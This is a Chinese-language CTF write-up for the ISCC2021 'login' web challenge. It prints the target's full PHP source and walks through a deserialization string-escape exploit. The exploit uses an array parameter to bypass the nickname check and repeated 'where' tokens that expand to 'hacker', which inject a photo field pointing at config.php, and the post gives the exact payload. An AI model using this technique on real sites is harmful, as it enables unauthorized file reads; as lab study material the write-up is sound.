ISCC2021— 登录

最新推荐文章于 2021-11-30 18:07:03 发布
最新推荐文章于 2021-11-30 18:07:03 发布
阅读量797 收藏 3
点赞数 2
分类专栏: CTF刷题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/song123sh/article/details/117036880
版权

这道题神似BUU上一道0CTF—piapiapia

直接开整

扫描一下目录,这里用御剑扫不出来www.zip似乎字典没有添加

我是在kali中使用dirsearch

image-20210517233932801

在http://39.96.91.106:7010/www.zip中下载了一个压缩包,解压后发现是源代码

这里把源代码贴一下

index.php

<?php
	require_once('class.php');
	if($_SESSION['username']) {
		header('Location: profile.php');
		exit;
	}
	if($_POST['username'] && $_POST['password']) {
		$username = $_POST['username'];
		$password = $_POST['password'];

		if(strlen($username) < 3 or strlen($username) > 16) 
			die('Invalid user name');

		if(strlen($password) < 3 or strlen($password) > 16) 
			die('Invalid password');

		if($user->login($username, $password)) {
			$_SESSION['username'] = $username;
			header('Location: profile.php');
			exit;	
		}
		else {
			die('Invalid user name or password');
		}
	}
	else {
?>
<!DOCTYPE html>
<html>
<head>
   <title>Login</title>
   <link href="static/bootstrap.min.css" rel="stylesheet">
   <script src="static/jquery.min.js"></script>
   <script src="static/bootstrap.min.js"></script>
</head>
<body>
	<div class="container" style="margin-top:100px">  
		<form action="index.php" method="post" class="well" style="width:220px;margin:0px auto;"> 
			<img src="static/piapiapia.gif" class="img-memeda " style="width:180px;margin:0px auto;">
			<h3>Login</h3>
			<label>Username:</label>
			<input type="text" name="username" style="height:30px"class="span3"/>
			<label>Password:</label>
			<input type="password" name="password" style="height:30px" class="span3">

			<button type="submit" class="btn btn-primary">LOGIN</button>
		</form>
	</div>
</body>
</html>
<?php
	}
?>

没什么卵用的注册源码register.php

<?php
	require_once('class.php');
	if($_POST['username'] && $_POST['password']) {
		$username = $_POST['username'];
		$password = $_POST['password'];

		if(strlen($username) < 3 or strlen($username) > 16) 
			die('Invalid user name');

		if(strlen($password) < 3 or strlen($password) > 16) 
			die('Invalid password');
		if(!$user->is_exists($username)) {
			$user->register($username, $password);
			echo 'Register OK!<a href="index.php">Please Login</a>';		
		}
		else {
			die('User name Already Exists');
		}
	}
	else {
?>
<!DOCTYPE html>
<html>
<head>
   <title>Login</title>
   <link href="static/bootstrap.min.css" rel="stylesheet">
   <script src="static/jquery.min.js"></script>
   <script src="static/bootstrap.min.js"></script>
</head>
<body>
	<div class="container" style="margin-top:100px">  
		<form action="register.php" method="post" class="well" style="width:220px;margin:0px auto;"> 
			<img src="static/piapiapia.gif" class="img-memeda " style="width:180px;margin:0px auto;">
			<h3>Register</h3>
			<label>Username:</label>
			<input type="text" name="username" style="height:30px"class="span3"/>
			<label>Password:</label>
			<input type="password" name="password" style="height:30px" class="span3">

			<button type="submit" class="btn btn-primary">REGISTER</button>
		</form>
	</div>
</body>
</html>
<?php
	}
?>

注册登陆后的profile.php

<?php
	require_once('class.php');
	if($_SESSION['username'] == null) {
		die('Login First');	
	}
	$username = $_SESSION['username'];
	$profile=$user->show_profile($username);
	if($profile  == null) {
		header('Location: update.php');
	}
	else {
		$profile = unserialize($profile);
		$phone = $profile['phone'];
		$email = $profile['email'];
		$nickname = $profile['nickname'];
		$photo = base64_encode(file_get_contents($profile['photo']));
?>
<!DOCTYPE html>
<html>
<head>
   <title>Profile</title>
   <link href="static/bootstrap.min.css" rel="stylesheet">
   <script src="static/jquery.min.js"></script>
   <script src="static/bootstrap.min.js"></script>
</head>
<body>
	<div class="container" style="margin-top:100px">  
		<img src="https://img-blog.csdnimg.cn/2022010709534846637.gif" class="img-memeda " style="width:180px;margin:0px auto;">
		<h3>Hi <?php echo $nickname;?></h3>
		<label>Phone: <?php echo $phone;?></label>
		<label>Email: <?php echo $email;?></label>
	</div>
</body>
</html>
<?php
	}
?>

update.php

<?php
	require_once('class.php');
	if($_SESSION['username'] == null) {
		die('Login First');	
	}
	if($_POST['phone'] && $_POST['email'] && $_POST['nickname'] && $_FILES['photo']) {

		$username = $_SESSION['username'];
		if(!preg_match('/^\d{11}$/', $_POST['phone']))
			die('Invalid phone');

		if(!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email']))
			die('Invalid email');
		
		if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
			die('Invalid nickname');

		$file = $_FILES['photo'];
		if($file['size'] < 5 or $file['size'] > 1000000)
			die('Photo size error');

		move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
		$profile['phone'] = $_POST['phone'];
		$profile['email'] = $_POST['email'];
		$profile['nickname'] = $_POST['nickname'];
		$profile['photo'] = 'upload/' . md5($file['name']);

		$user->update_profile($username, serialize($profile));
		echo 'Update Profile Success!<a href="profile.php">Your Profile</a>';
	}
	else {
?>
<!DOCTYPE html>
<html>
<head>
   <title>UPDATE</title>
   <link href="static/bootstrap.min.css" rel="stylesheet">
   <script src="static/jquery.min.js"></script>
   <script src="static/bootstrap.min.js"></script>
</head>
<body>
	<div class="container" style="margin-top:100px">  
		<form action="update.php" method="post" enctype="multipart/form-data" class="well" style="width:220px;margin:0px auto;"> 
			<img src="static/piapiapia.gif" class="img-memeda " style="width:180px;margin:0px auto;">
			<h3>Please Update Your Profile</h3>
			<label>Phone:</label>
			<input type="text" name="phone" style="height:30px"class="span3"/>
			<label>Email:</label>
			<input type="text" name="email" style="height:30px"class="span3"/>
			<label>Nickname:</label>
			<input type="text" name="nickname" style="height:30px" class="span3">
			<label for="file">Photo:</label>
			<input type="file" name="photo" style="height:30px"class="span3"/>
			<button type="submit" class="btn btn-primary">UPDATE</button>
		</form>
	</div>
</body>
</html>
<?php
	}
?>

核心的处理代码,class.php

<?php
require('config.php');

class user extends mysql{
	private $table = 'users';

	public function is_exists($username) {
		$username = parent::filter($username);

		$where = "username = '$username'";
		return parent::select($this->table, $where);
	}
	public function register($username, $password) {
		$username = parent::filter($username);
		$password = parent::filter($password);

		$key_list = Array('username', 'password');
		$value_list = Array($username, md5($password));
		return parent::insert($this->table, $key_list, $value_list);
	}
	public function login($username, $password) {
		$username = parent::filter($username);
		$password = parent::filter($password);

		$where = "username = '$username'";
		$object = parent::select($this->table, $where);
		if ($object && $object->password === md5($password)) {
			return true;
		} else {
			return false;
		}
	}
	public function show_profile($username) {
		$username = parent::filter($username);

		$where = "username = '$username'";
		$object = parent::select($this->table, $where);
		return $object->profile;
	}
	public function update_profile($username, $new_profile) {
		$username = parent::filter($username);
		$new_profile = parent::filter($new_profile);

		$where = "username = '$username'";
		return parent::update($this->table, 'profile', $new_profile, $where);
	}
	public function __tostring() {
		return __class__;
	}
}

class mysql {
	private $link = null;

	public function connect($config) {
		$this->link = mysql_connect(
			$config['hostname'],
			$config['username'], 
			$config['password']
		);
		mysql_select_db($config['database']);
		mysql_query("SET sql_mode='strict_all_tables'");

		return $this->link;
	}

	public function select($table, $where, $ret = '*') {
		$sql = "SELECT $ret FROM $table WHERE $where";
		$result = mysql_query($sql, $this->link);
		return mysql_fetch_object($result);
	}

	public function insert($table, $key_list, $value_list) {
		$key = implode(',', $key_list);
		$value = '\'' . implode('\',\'', $value_list) . '\''; 
		$sql = "INSERT INTO $table ($key) VALUES ($value)";
		return mysql_query($sql);
	}

	public function update($table, $key, $value, $where) {
		$sql = "UPDATE $table SET $key = '$value' WHERE $where";
		return mysql_query($sql);
	}

	public function filter($string) {
		$escape = array('\'', '\\\\');
		$escape = '/' . implode('|', $escape) . '/';
		$string = preg_replace($escape, '_', $string);

		$safe = array('select', 'insert', 'update', 'delete', 'where');
		$safe = '/' . implode('|', $safe) . '/i';
		return preg_replace($safe, 'hacker', $string);
	}
	public function __tostring() {
		return __class__;
	}
}
session_start();
$user = new user();
$user->connect($config);

最后是config.php

<?php
	$config['hostname'] = '127.0.0.1';
	$config['username'] = 'root';
	$config['password'] = '';
	$config['database'] = '';
	$flag = '';
?>

看来flag就是在config.php中了,要想办法拿到config.php的内容

然后就是代码审计

这个地方貌似有个文件读取的地方,在profile.php中

	else {
		$profile = unserialize($profile);
		$phone = $profile['phone'];
		$email = $profile['email'];
		$nickname = $profile['nickname'];
		$photo = base64_encode(file_get_contents($profile['photo']));
?>

上面还有个反序列化unserialize,感觉有戏,如果$profile[‘photo’]是config.php就可以读取到了,可以对photo进行操作的地方在update.php,有phone、email、nickname和photo这几个

$profile = a:4:{s:5:"phone";s:11:"12345678901";s:5:"email";s:8:"ss@q.com";s:8:"nickname";s:8:"sea_sand";s:5:"photo";s:10:"config.php";}s:39:"upload/804f743824c0451b2f60d81b63b6a900";}
print_r(unserialize($profile));

结果如下:
Array
(
    [phone] => 13838438250
    [email] => 1234567890@qq.com
    [nickname] => 123456
    [photo] => config.php
)

可以看到反序列化之后,最后面upload这一部分就没了,下面就是想办法把config.php塞进去了。

从数组顺序上看是和上面数组的顺序一样的,可以抓个包看下post顺序,那么最有可能的就是从nickname下手了。

在设置了$profile之后,用update_profile()函数进行处理

	public function update_profile($username, $new_profile) {
		$username = parent::filter($username);
		$new_profile = parent::filter($new_profile);

		$where = "username = '$username'";
		return parent::update($this->table, 'profile', $new_profile, $where);
	}

过滤后

public function filter($string) {
		$escape = array('\'', '\\\\');
		$escape = '/' . implode('|', $escape) . '/';
		$string = preg_replace($escape, '_', $string);

		$safe = array('select', 'insert', 'update', 'delete', 'where');
		$safe = '/' . implode('|', $safe) . '/i';
		return preg_replace($safe, 'hacker', $string);
	}

有两个正则过滤,带上输入nickname时候有一个正则,总共三个过滤的地方,首先要绕过第一个输入时候的正则:

if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
			die('Invalid nickname');
数组即可绕过:
nickname[]=

那么$profile就是这样了:
$profile = a:4:{s:5:"phone";s:11:"13838438250";s:5:"email";s:8:"1234567890@q.com";s:8:"nickname";a:1:{i:0;s:3:"xxx"};s:5:"photo";s:10:"config.php";}s:39:"upload/804f743824c0451b2f60d81b63b6a900";}

后面的正则要怎么利用呢,可以看到如果我们输入的有where,会替换成hacker,这样的话长度就变了,序列化后的每个变量都是有长度的,那么反序列化会怎么处理呢?我们应该怎么构造呢?

数组绕过了第一个正则过滤之后,如果nickname最后面塞上";}s:5:“photo”;s:10:“config.php”;},一共是34个字符,如果利用正则替换34个where,不就可以把这34个给挤出去,后面的upload因为序列化串被我们闭合了也就没用了

nickname[]=wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}

$profile = a:4:{s:5:"phone";s:11:"12345678901";s:5:"email";s:8:"ss@q.com";s:8:"nickname";a:1:{i:0;s:204:"wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere"};s:5:"photo";s:10:"config.php";}s:39:"upload/804f743824c0451b2f60d81b63b6a900";}

操作开始,该我上场表演了

注册之后登陆,进入到update.php页面,输入信息及上传图片,这时用burpsuite抓包把nickname改成数组

image-20210517235449559

image-20210517235550885

然后进入到profile中查看图片信息或者源代码

image-20210517235649005

image-20210517235703196

解码得到

你喜欢这篇文章吗,主页或许有你想要的哦
点赞收藏加关注,一键三连不迷路!

Shadow丶S
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ISCC2021-REVERSE_Garden -WP
qq_42667177的博客
05-25 961
1、下载附件后是一个.pyc的文件,很明显这是python的编译文件,拿到在线反编译的网站上进行反编译即可得到源码。这里给出反编译网站及源码。 import platform import sys import marshal import types def check(s): f = '2(88\x006\x1a\x10\x10\x1aIKIJ+\x1a\x10\x10\x1a\x06' if len(s) != len(f): return False .
ISCC2021-MISC部分题目.zip
08-07
ISCC2021-MISC部分题目.zip是一个与ISCC(International Symposium on Computer Science and Convergence,国际计算机科学与融合大会)相关的压缩包文件。这个压缩包可能包含了该会议的多份论文、研究报告或者竞赛...
ISCC2021
sparename的博客
05-26 813
MSIC李华的红包Retrieve_the_passcode海市蜃楼1美人计ISCC客服一号冲冲冲(一)这是啥Web01 李华的红包 打开得到一张半张图片 题目其实有提示,将图片大小改为521*521,可以看到下面有一个鼓,对应敲击,将图表格式改为rar,看见haobao.txt文件,打开数字为24,43,13,13,12,21,43,猜测为敲击码 得ISCC{ISCCBFS} Retrieve_the_passcode 下载压缩文件查看有下面文件和一个加密的PDF 根据数据画出图片散点图如下: 输入密
2021-ISCC
jemo的博客
05-24 968
web题练武题web1-ISCC客服冲冲冲(一)web2-这是啥web3-web01 练武题 web1-ISCC客服冲冲冲(一) 1.写个脚本(不会) 2.用连点器(不想) 3.左右互换,让真正的一号票数增加(就这个) 然后就得出flag web2-这是啥 F12查看源代码,jsfuck加密 也可以谷歌的控制台,复制粘贴回车得出flag web3-web01 进入页面,让你想看看robots.txt协议 访问robots.txt 按照管理,不让访问,那必须访问,得到如下代码 <?php &
ISCC-2021
qq_53142368的博客
05-24 1105
文章目录一、ISCC客服冲冲冲(一)二、这是啥三、Web01四、ISCC客服一号冲冲冲(二)五、登录六、which is the true iscc 一、ISCC客服冲冲冲(一) 可以下载一个点击器,或者直接F12在html中改,right改成left,left改成right 二、这是啥 鼠标右键打开页面源代码 发现jsfuck编码, 直接将其进行解码即可得到flag 三、Web01 Why don't you take a look at robots.txt? 在后面加上robots.txt后.
ISCC_2021_WP
qq_51518576的博客
05-31 827
练武题MISCRetrieve the passcode海市蜃楼-1我的折扣是多少WEBISCC客服冲冲冲(一) MISC 题目: Scatter说他能解开这个古怪的密码,你呢?来试试吧! Flag格式:ISCC{XXX},XXX为小写字符串,不包括空格 附件: 1:3:1;1.25:3:1;1.5:3:1;1.75:3:1;2:3:1;2:2.75:1;2:2.5:1;2:2.25:1;2:2:1;2:1.75:1;2:1.5:1;1:2.25:1;1.25:2.25:1;1.5:2.25:1;1.75:
ISCC2021线上赛赛题.zip
05-19
ISCC2021线上赛赛题.zip wp见主页
ISCC2022题目附件
06-06
2022ISCC所有题目附件,包含ISCC2022-练武题附件和ISCC2022-擂台题附件 信息安全已涉及到国家政治、经济、文化、社会和生态文明的建设,信息系统越发展到它的高级阶段,人们对其依赖性就越强,从某种程度上讲其越...
ISCC题库.docx
05-23
ISCC2020比赛题库 ISCC ISCC ISCC ISCC
CTF,ISCC各个隐写总结
08-29
ISCC( Invisible Steganographic Communication Challenge)是其中专注于隐写术的一个专门比赛。隐写术是一种信息隐藏技术,它允许数据被嵌入到各种媒体文件中,如图片、音频或视频,而不易被察觉。这篇总结将深入...
ISCC 2021 SSTI
E1even的博客
06-21 494
ISCC中遇到了一道SSTI的题目,拿来练练手,题目难度的化,相对于普遍的过滤来说,这个过滤要更狠一点把。 看题: 进去之后是这样的,也没有提示传参,但是题目是lovely ssti 盲猜who am i 传参点应该是这个表情,这里仕林哥哥直接告诉了表情包叫xiaodouni,我就不去信息搜集了 FUZZ测试: 测试结果: 过滤了:_ ‘’ requests chr . chr 实操过程中还出现了字符串反转 思路: 过滤 . : 采用 |attr可以绕过 过滤单引号: 可以用双引号或
ISCC2021——wp
m0_46296905的博客
11-30 1637
文章目录一、MISC(二)Retrieve_the_passcode(二)海市蜃楼-1(三)区块链(四)小明的宠物兔(五)小明的表情包二、Mobile(一)Mobile Normal(二)Mobile Easy三、Reverse(一)Garden(二)Analysis 一、MISC (二)Retrieve_the_passcode ARCHPR不能破解RAR5.0版本的rar文件 import numpy as np import matplotlib.pyplot as plt from mpl_tool
ISCC2021wp
outman23的博客
05-31 472
Web ISCC客服冲冲冲(一) 方法一 打开chome浏览器在控制台中打入以下代码 setInterval(function(){document.getElementById("ISCC客服一号").click();},1000); ​ 方法二 F12 调换两者投票的位置 这是啥 把代码块复制到 chome concole 里运行 得到源码 iscc{what_is*_jsJS&} Web01 进入题目后 然后看一下robots.bot协议 提示code.code.txt,打开看一下
ISCC2021-这是啥
一个普普通通的博客
05-19 289
打开页面 嗯? **介是嘛?**好家伙,还有口音 照例Ctrl+u看一下源代码 嗨!就这???jsfuck而已,我们复制下来,注意这里不要复制多了,开头结尾都要删一点 保留:我草(一种植物)好长 [][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+
ISCC2021 真作假时假亦真
半岛铁盒的博客
05-26 523
这道题套娃给我套吐了 这题有点烦人 给了个音频文件,我以为是音频隐写,忙活了半天不是; 把这个音频foremost分离一下 会得到一张图片,把图片拉长, 加了下面的QQ号 这个QQ号里面的 留言板 以及 加好友的 flag都是假的 空间里面这张图片可以继续进行解密 密码base64解开 得到 得到一串数字字符 数字的话 汉字转为1 ,数字转为0 接下来就是 二进制码转二维码 from PIL import Image MAX = 25 pic = Image.new("RGB",(
ISCC2021✿小明的宠物兔
Tokeii想躺平
05-17 685
解题流程: 图片foremost分离,得到一个压缩包,解压,一个flag.txt,一个key.zip,flag.txt里面为rabbit加密,key.zip里面文本大小为5,这里crc32爆破然后解密完事 flag没有
ISCC2021-Web01
一个普普通通的博客
05-19 470
正则匹配最后的倔强,那我倒要看看有多倔强 打开链接 Why don't you take a look at robots.txt? 行,爷这回听你的 又来??? 行,爷还听你的 这里我刚开始出错了,把/src也给整上了,迷惑了好半天,罪过 审计后发现,密码在这藏着呢 ...
ISCC2021—美人计
一个普普通通的博客
05-19 1130
美人计 拿到题目下载文件,得到一张绯红女巫,啊不,伊丽莎白·奥尔森的照片,还有一张二维码 扫码结果看着像base64 扫码内容: U2FsdGVkX1/Ka+sScszwQkwhO+VLiJwV/6IFg5W+TfNHGxG2qZsIr2iwMwb9X9Iu 3GuGWmPOtO27z8vNppD2D50fwsD+8VWhdtW9J4cewYivH/Z/7GoUvcJXJMrvf+vu +CBqWDGp6HWd0e5whGhuzlK0ZtBcDZdPDSIHA7+GuUlifp8PcFCtJPgiuk143
ISCC 2021 WP
夏日 の blog
05-25 7197
MISC 李华的红包 打开发现是一个图片,binwalk分离下文件后得到一个txt文件,内容如下 24,43,13,13,12,21,43 很明显是敲击码(如果改下图片大小为521*521会看到下面有个鼓也会提示这是敲击码) 分别对应着ISCCBFS ISCC{ISCCBFS} Retrieve the passcode 解压后得到一个压缩包和一个名为scatter的txt文档 打开txt文档发现 1:3:1;1.25:3:1;1.5:3:1;1.75:3:1;2:3:1;2:2.75:1;2:2.5
ISCC where
最新发布
09-08
ISCC是指"Intelligent Self-Configuring Cluster",其中的"ISCC"表示智能自配置集群。在ISCC中,有两种集群形式,一种是分散式集群,另一种是集中式集群。在分散式集群中,每个节点都有潜力成为簇头,而在集中式集群...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Shadow丶S

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值